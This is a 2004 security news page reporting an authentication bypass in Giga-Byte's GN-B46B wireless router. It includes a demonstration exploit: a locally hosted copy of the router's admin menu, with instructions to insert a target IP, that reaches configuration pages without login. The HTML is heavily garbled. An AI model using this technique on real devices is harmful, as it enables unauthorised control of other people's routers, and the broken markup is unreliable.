Press CTRL-D to bookmark us
Welcome Guest Login / Register / Members
Search in  
Top Submit newsSubscribe
Communication | Computer Crime | Digital Audio, Video, Photo | General News | Hardware | Internet | Mobile | PDA | Security | Software | Vulnerability |
Previous articleBack to news listNext article
 

 Sponsored links

Want to become one of our authors and see your work published on ALLSeek.iNFO ?
 
 Giga-Byte Technology Router Authentication Flaw Lets Remote Users Access the Device
Categorie: Vulnerability
Posted: 2004-02-25 by ReCall
Views: 580
Source: Click here
 		Current Rating: Not rated
Poor Best
 Details
Description: Rafel Ivgi (The-Insider) reported an authentication vulnerability in the GN-B46B broadband wireless router from Giga-Byte Technology. A remote user can gain access to the device.

It is reported that a remote user can host a copy of the router's HTML menu locally on the remote user's system. Then, the remote user can load the HTML and use the embedded links to access the device without having to authenticate.

A demonstration exploit menu


Just copy this to a ".html" file and replace with the target's IP.

htdocs








English









































width="1"
height="1">
onMouseover="imgOn('image1')"; onMouseout="imgOff('image1')">
width="184" height="23">
href="status.htm" target=main onMouseover="imgOn('image2')";
onMouseout="imgOff('image2')">
width="184" height="31">
onMouseover="imgOn('image3')"; onMouseout="imgOff('image3')">
width="184" height="29">
width="1"
height="1">

height="34">

<
/td>

class="lightBlackBg">

























eight="1">

border="0" width="7" height="7">  Network Configur
ation





     href="NetworkSetup3.htm" target=main > src="../picture/icon_list_sub.gif" border="0" align="absmiddle" width="
7"
height="7"> LAN Configuration
     href="NetworkSetup2.htm" target=main > src="../picture/icon_list_sub.gif" border="0" align="absmiddle" width="
7"
height="7"> WAN Configuration
     href="NetworkSetup1.htm" target=main > src="../picture/icon_list_sub.gif" border="0" align="absmiddle" width="
7"
height="7"> WAN Setting

border="0" width="7" height="7">  Wireless Configu
ration



     href="WirelessSetup2B.htm" target=main > src="../picture/icon_list_sub.gif" border="0" align="absmiddle" width="
7"
height="7"> 802.11b
     href="MACcontrol11b.htm" target=main > src="../picture/icon_list_sub.gif" border="0" align="absmiddle" width="
7"
height="7"> MAC Access Control

width="7" height="7">  Static Routing Table

border="0" width="7" height="7">  Virtual Server





     href="VirtualServer1.htm" target=main > src="../picture/icon_list_sub.gif" border="0" align="absmiddle" width="
7"
height="7"> DMZ
     href="VirtualServer2.htm" target=main > src="../picture/icon_list_sub.gif" border="0" align="absmiddle" width="
7"
height="7"> PPPoE/DHCP/Static
     href="VirtualServer3.htm" target=main > src="../picture/icon_list_sub.gif" border="0" align="absmiddle" width="
7"
height="7"> PPPoE Unnumber

border="0" width="7" height="7">  Firewall Rule





     href="Firewall1.htm" target=main > border="0" align="absmiddle" width="7"
height="7"> Security
     href="Firewall3.htm" target=main > border="0" align="absmiddle" width="7" height="7">&nb
sp;VPN Pass
Through
     href="Firewall2.htm" target=main > border="0" align="absmiddle" width="7" height="7">&nb
sp;Static
Rule

width="7" height="7">  DNS Replay
eight="1">


<
/td>

height="31">

<
/td>

class="lightBlackBg">














































eight="1">
target=main>
width="7" height="7">  PPP Monitor

width="7" height="7">  Reboot

width="7" height="7">  Initialization

width="7" height="7">  Change Password

width="7" height="7">  Change WAN MAC

width="7" height="7">  Upgrade Firmware

width="7" height="7">  BackUp/Restore

border="0" width="7" height="7">  Log Information





     ref="#"
target=main onclick="MoveOn('firelog', this)"> src="../picture/icon_list_sub.gif" border="0" align="absmiddle" width="
7"
height="7"> Firewall Log
     ref="#"
target=main onclick="MoveOn('connlog', this)"> src="../picture/icon_list_sub.gif" border="0" align="absmiddle" width="
7"
height="7"> WAN Connection
     ref="#"
target=main onclick="MoveOn('upnplog', this)"> src="../picture/icon_list_sub.gif" border="0" align="absmiddle" width="
7"
height="7"> UPnP Log

width="7" height="7">  Save Maintenance

width="7" height="7">  Help

width="7" height="7">  Ping

width="7" height="7">  About
eight="1">


<
/td>
width="1"
height="1">










Impact: A remote user can access the device without having to authenticate to the device.

Solution: No solution was available at the time of this entry.
 
Syndication
Permalink Email this

The URI to TrackBack this entry is:
http://allseek.info/news/trackback.php?id=739

User comments (post your comments here)

Only registerd members can post comments and articles
 
Previous articleBack to news listNext article
 


InterJOB.su
Bookmark us | Set As Homepage | Advertising | Contact Us | Recomend us | Link us | Links | Terms

SpyLOG Page Rank Checker
LAST QUERIES